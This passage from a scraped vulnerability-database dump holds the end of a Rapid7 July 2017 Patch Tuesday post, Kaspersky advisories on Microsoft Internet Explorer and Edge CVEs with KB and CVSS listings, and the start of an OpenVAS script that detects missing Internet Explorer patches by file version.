RCE vulnerability that could allow an attacker to take full control of a system by sending specially crafted messages to the Windows Search service. This typically requires access to the target computer. However, in an enterprise setting, it is possible for a remote, unauthenticated actor to trigger the vulnerability via an SMB connection. Fixes for CVE-2017-8589 have been released for all supported versions of Windows, so server administrators aren't off the hook for patching. There is also <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-US%2Fsecurity-guidance%2Fadvisory%2FCVE-2017-8501\" rel=\"nofollow\" target=\"_blank\">CVE-2017-8501</a>, which affects SharePoint Enterprise Server 2013.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>One final point of interest: last month, Microsoft released a fix for <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fportal.msrc.microsoft.com%2Fen-US%2Fsecurity-guidance%2Fadvisory%2FCVE-2017-8529\" rel=\"nofollow\" target=\"_blank\">CVE-2017-8529</a> (a browser information disclosure vulnerability whereby an attacker can detect specific files on the user's computer) that <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fsupport.microsoft.com%2Fen-ca%2Fhelp%2F4032782%2Fa-blank-page-or-404-error-prints-when-you-try-to-print-a-frame-in-ie\" rel=\"nofollow\" target=\"_blank\">broke the printing functionality</a> in Internet Explorer and Edge for some users. Over the next two weeks they released various updates to resolve the printing issue, which ultimately <em>removed</em> the protection against CVE-2017-8529. Microsoft has still not been able to resolve the security issue without reintroducing the printing bug, and customers who take automatic updates will still be vulnerable. As of this writing, the only way to be protected is to have applied the June updates and no others (which is not recommended). The severity of CVE-2017-8529 is considered low (on server systems) to moderate (otherwise). If it is of concern, for example on particularly sensitive systems, a workaround would be to use a different web browser until this vulnerability is correctly patched.</p></div>", "cvss3": {}, "published": "2017-07-12T13:39:36", "title": "Patch Tuesday - July 2017", "type": "rapid7community", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-8501", "CVE-2017-3099", "CVE-2017-8589", "CVE-2017-8529"], "modified": "2017-07-12T13:39:36", "href": "https://community.rapid7.com/community/nexpose/blog/2017/07/12/patch-tuesday-july-2017", "id": "RAPID7COMMUNITY:2686BC995183CF24B568CF55F2EDAD7B", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kaspersky": [{"lastseen": "2021-08-18T11:17:27", "description": "### *Detect date*:\n06/13/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Internet Explorer and Microsoft Edge. Malicious users can exploit these vulnerabilities to execute arbitrary code and obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Edge \nMicrosoft Internet Explorer versions 9 through 11\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8520](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8520>) \n[CVE-2017-8498](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8498>) \n[CVE-2017-8499](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8499>) \n[CVE-2017-8496](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8496>) \n[CVE-2017-8497](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8497>) \n[CVE-2017-8523](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8523>) \n[CVE-2017-8530](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8530>) \n[CVE-2017-8524](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8524>) \n[CVE-2017-8522](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8522>) \n[CVE-2017-8549](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8549>) \n[CVE-2017-8517](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8517>) \n[CVE-2017-8521](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8521>) \n[CVE-2017-8504](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8504>) \n[CVE-2017-8548](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8548>) \n[CVE-2017-8519](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8519>) \n[CVE-2017-8547](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8547>) \n[CVE-2017-8555](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8555>) \n[CVE-2017-8529](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8529>) \n[CVE-2017-8496](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8496>) \n[CVE-2017-8497](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8497>) \n[CVE-2017-8498](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8498>) \n[CVE-2017-8499](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8499>) \n[CVE-2017-8504](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8504>) \n[CVE-2017-8517](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8517>) \n[CVE-2017-8519](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8519>) \n[CVE-2017-8520](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8520>) \n[CVE-2017-8521](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8521>) \n[CVE-2017-8522](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8522>) \n[CVE-2017-8523](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8523>) \n[CVE-2017-8524](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8524>) \n[CVE-2017-8529](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8529>) \n[CVE-2017-8547](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8547>) \n[CVE-2017-8548](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8548>) \n[CVE-2017-8549](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8549>) \n[CVE-2017-8555](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8555>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-8496](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8496>)7.6Critical \n[CVE-2017-8497](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8497>)7.6Critical \n[CVE-2017-8498](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8498>)4.3Warning \n[CVE-2017-8499](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8499>)7.6Critical \n[CVE-2017-8504](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8504>)4.3Warning \n[CVE-2017-8517](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8517>)7.6Critical \n[CVE-2017-8519](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8519>)7.6Critical \n[CVE-2017-8520](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8520>)7.6Critical \n[CVE-2017-8521](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8521>)7.6Critical \n[CVE-2017-8522](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8522>)7.6Critical \n[CVE-2017-8523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8523>)4.3Warning \n[CVE-2017-8524](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8524>)7.6Critical \n[CVE-2017-8529](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8529>)4.3Warning \n[CVE-2017-8530](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8530>)5.8High \n[CVE-2017-8547](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8547>)7.6Critical \n[CVE-2017-8548](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8548>)7.6Critical \n[CVE-2017-8549](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8549>)7.6Critical \n[CVE-2017-8555](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8555>)4.3Warning\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4038788](<http://support.microsoft.com/kb/4038788>) \n[4038782](<http://support.microsoft.com/kb/4038782>) \n[4038783](<http://support.microsoft.com/kb/4038783>) \n[4038792](<http://support.microsoft.com/kb/4038792>) \n[4038799](<http://support.microsoft.com/kb/4038799>) \n[4038781](<http://support.microsoft.com/kb/4038781>) \n[4038777](<http://support.microsoft.com/kb/4038777>) \n[4022719](<http://support.microsoft.com/kb/4022719>) \n[4022726](<http://support.microsoft.com/kb/4022726>) \n[4022714](<http://support.microsoft.com/kb/4022714>) \n[4021558](<http://support.microsoft.com/kb/4021558>) \n[4022724](<http://support.microsoft.com/kb/4022724>) \n[4022727](<http://support.microsoft.com/kb/4022727>) \n[4022715](<http://support.microsoft.com/kb/4022715>) \n[4022725](<http://support.microsoft.com/kb/4022725>) \n[4036586](<http://support.microsoft.com/kb/4036586>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-13T00:00:00", "type": "kaspersky", "title": "KLA11045 Multiple vulnerabilities in Microsoft Edge and Microsoft Internet Explorer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8496", "CVE-2017-8497", "CVE-2017-8498", "CVE-2017-8499", "CVE-2017-8504", "CVE-2017-8517", "CVE-2017-8519", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8522", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-8529", "CVE-2017-8530", "CVE-2017-8547", "CVE-2017-8548", "CVE-2017-8549", "CVE-2017-8555"], "modified": "2020-06-18T00:00:00", "id": "KLA11045", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11045/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T18:09:55", "description": "### *Detect date*:\n06/13/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nMicrosoft Silverlight 5 when installed on Microsoft Windows (x64-based) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nInternet Explorer 9 \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for x64-based systems \nWindows Server 2012 \nMicrosoft Office 2010 Service Pack 2 (32-bit editions) \nMicrosoft Lync 2010 (32-bit) \nMicrosoft Lync 2013 Service Pack 1 (32-bit) \nSkype for Business 2016 (64-bit) \nMicrosoft Office 2013 Service Pack 1 (32-bit editions) \nInternet Explorer 11 \nMicrosoft Office 2010 Service Pack 2 (64-bit editions) \nMicrosoft Lync 2013 Service Pack 1 (64-bit) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nMicrosoft Office 2016 Click-to-Run (C2R) for 32-bit editions \nWindows Server 2016 \nMicrosoft Lync 2010 Attendee (admin level install) \nWindows RT 8.1 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 10 Version 1703 for x64-based Systems \nSkype for Business 2016 (32-bit) \nMicrosoft Lync 2010 Attendee (user level install) \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nMicrosoft Lync 2010 (64-bit) \nMicrosoft Office Word Viewer \nMicrosoft Live Meeting 2007 Console \nMicrosoft Silverlight 5 Developer Runtime when installed on Microsoft Windows (32-bit) \nMicrosoft Edge (EdgeHTML-based) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nMicrosoft Silverlight 5 Developer Runtime when installed on Microsoft Windows (x64-based) \nMicrosoft Office 2007 Service Pack 3 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nMicrosoft Office 2013 Service Pack 1 (64-bit editions) \nWindows 10 Version 1607 for 32-bit Systems \nMicrosoft Office 2016 Click-to-Run (C2R) for 64-bit editions \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nInternet Explorer 10 \nWindows 10 Version 1703 for 32-bit Systems \nMicrosoft Silverlight 5 when installed on Microsoft Windows (32-bit) \nWindows Server 2012 R2 \nMicrosoft Live Meeting 2007 Add-in\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8485](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8485>) \n[CVE-2017-8484](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8484>) \n[CVE-2017-8481](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8481>) \n[CVE-2017-8480](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8480>) \n[CVE-2017-8469](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8469>) \n[CVE-2017-8482](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8482>) \n[CVE-2017-8464](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8464>) \n[CVE-2017-8544](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8544>) \n[CVE-2017-8462](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8462>) \n[CVE-2017-0289](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0289>) \n[CVE-2017-0288](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0288>) \n[CVE-2017-8528](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8528>) \n[CVE-2017-8529](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8529>) \n[CVE-2017-0283](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0283>) \n[CVE-2017-0282](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0282>) \n[CVE-2017-0287](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0287>) \n[CVE-2017-0286](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0286>) \n[CVE-2017-0285](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0285>) \n[CVE-2017-0284](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0284>) \n[CVE-2017-8483](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8483>) \n[CVE-2017-8517](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8517>) \n[CVE-2017-0193](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0193>) \n[CVE-2017-8471](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8471>) \n[CVE-2017-0298](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0298>) \n[CVE-2017-8478](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8478>) \n[CVE-2017-8479](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8479>) \n[CVE-2017-8543](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8543>) \n[CVE-2017-8492](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8492>) \n[CVE-2017-8490](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8490>) \n[CVE-2017-8491](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8491>) \n[CVE-2017-8470](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8470>) \n[CVE-2017-8489](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8489>) \n[CVE-2017-8472](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8472>) \n[CVE-2017-8473](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8473>) \n[CVE-2017-8553](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8553>) \n[CVE-2017-8475](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8475>) \n[CVE-2017-8476](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8476>) \n[CVE-2017-8488](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8488>) \n[CVE-2017-0294](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0294>) \n[CVE-2017-0296](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0296>) \n[CVE-2017-0297](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0297>) \n[CVE-2017-8534](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8534>) \n[CVE-2017-8477](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8477>) \n[CVE-2017-8531](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8531>) \n[CVE-2017-0299](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0299>) \n[CVE-2017-8533](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8533>) \n[CVE-2017-8532](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8532>) \n[CVE-2017-8527](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8527>) \n[CVE-2017-8519](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8519>) \n[CVE-2017-0260](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0260>) \n[CVE-2017-0300](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0300>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-0284](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0284>)\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4022719](<http://support.microsoft.com/kb/4022719>) \n[4021558](<http://support.microsoft.com/kb/4021558>) \n[4022722](<http://support.microsoft.com/kb/4022722>) \n[4024402](<http://support.microsoft.com/kb/4024402>) \n[4022008](<http://support.microsoft.com/kb/4022008>) \n[4021903](<http://support.microsoft.com/kb/4021903>) \n[4021923](<http://support.microsoft.com/kb/4021923>) \n[4022013](<http://support.microsoft.com/kb/4022013>) \n[4022010](<http://support.microsoft.com/kb/4022010>) \n[4018106](<http://support.microsoft.com/kb/4018106>) \n[4022887](<http://support.microsoft.com/kb/4022887>) \n[4022884](<http://support.microsoft.com/kb/4022884>) \n[4022883](<http://support.microsoft.com/kb/4022883>) \n[3217845](<http://support.microsoft.com/kb/3217845>) \n[4034679](<http://support.microsoft.com/kb/4034679>) \n[4034664](<http://support.microsoft.com/kb/4034664>) \n[4034741](<http://support.microsoft.com/kb/4034741>) \n[4036586](<http://support.microsoft.com/kb/4036586>) \n[4503292](<http://support.microsoft.com/kb/4503292>) \n[4503269](<http://support.microsoft.com/kb/4503269>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-13T00:00:00", "type": "kaspersky", "title": "KLA11842 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0193", "CVE-2017-0260", "CVE-2017-0282", "CVE-2017-0283", "CVE-2017-0284", "CVE-2017-0285", "CVE-2017-0286", "CVE-2017-0287", "CVE-2017-0288", "CVE-2017-0289", "CVE-2017-0294", "CVE-2017-0296", "CVE-2017-0297", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0300", "CVE-2017-8462", "CVE-2017-8464", "CVE-2017-8469", "CVE-2017-8470", "CVE-2017-8471", "CVE-2017-8472", "CVE-2017-8473", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8477", "CVE-2017-8478", "CVE-2017-8479", "CVE-2017-8480", "CVE-2017-8481", "CVE-2017-8482", "CVE-2017-8483", "CVE-2017-8484", "CVE-2017-8485", "CVE-2017-8488", "CVE-2017-8489", "CVE-2017-8490", "CVE-2017-8491", "CVE-2017-8492", "CVE-2017-8517", "CVE-2017-8519", "CVE-2017-8527", "CVE-2017-8528", "CVE-2017-8529", "CVE-2017-8531", "CVE-2017-8532", "CVE-2017-8533", "CVE-2017-8534", "CVE-2017-8543", "CVE-2017-8544", "CVE-2017-8553"], "modified": "2022-01-18T00:00:00", "id": "KLA11842", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11842/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-08T23:20:43", "description": "This host is missing a critical security\n update according to Microsoft security updates KB4021558.", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (KB4021558)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8522", "CVE-2016-3326", "CVE-2017-8517", "CVE-2017-8524", "CVE-2017-8519", "CVE-2017-8547", "CVE-2017-8529"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310810943", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810943", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (KB4021558)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:ie\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810943\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8517\", \"CVE-2017-8519\", \"CVE-2017-8522\", \"CVE-2017-8524\",\n \"CVE-2017-8529\", \"CVE-2017-8547\", \"CVE-2016-3326\");\n script_bugtraq_id(98895, 98899, 98926, 98930, 98953, 98932, 92287);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 12:38:50 +0530 (Wed, 14 Jun 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (KB4021558)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft security updates KB4021558.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple errors in the way JavaScript scripting engines handle objects in\n memory in Microsoft browsers.\n\n - Multiple errors when microsoft scripting engines do not properly handle\n objects in memory.\n\n - Multiple errors when Microsoft browsers improperly handle objects in memory.\n\n - An error when Internet Explorer improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to obtain information to further compromise the users system, execute\n arbitrary code in the context of the current user and detect specific files\n on the user's computer.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 9.x, 10.x and 11.x.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4021558\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3, win7:2, win7x64:2, win2008r2:2,\n win2012:1, win2012R2:1, win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nieVer = get_app_version(cpe:CPE);\nif(!ieVer || ieVer !~ \"^(9|1[01])\\.\"){\n exit(0);\n}\n\niePath = smb_get_system32root();\nif(!iePath ){\n exit(0);\n}\n\niedllVer = fetch_file_version(sysPath:iePath, file_name:\"Mshtml.dll\");\nsllVer = fetch_file_version(sysPath:iePath, file_name:\"Sqmapi.dll\");\n\nif(!iedllVer && !sllVer){\n exit(0);\n}\n\n##Server 2008\nif(hotfix_check_sp(win2008:3, win2008x64:3) > 0 && iedllVer)\n{\n if(version_in_range(version:iedllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16905\"))\n {\n Vulnerable_range = \"9.0.8112.16000 - 9.0.8112.16905\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:iedllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.21016\"))\n {\n Vulnerable_range = \"9.0.8112.20000 - 9.0.8112.21016\";\n VULN = TRUE ;\n }\n}\n\n# Win 2012\nelse if(hotfix_check_sp(win2012:1) > 0 && sllVer)\n{\n 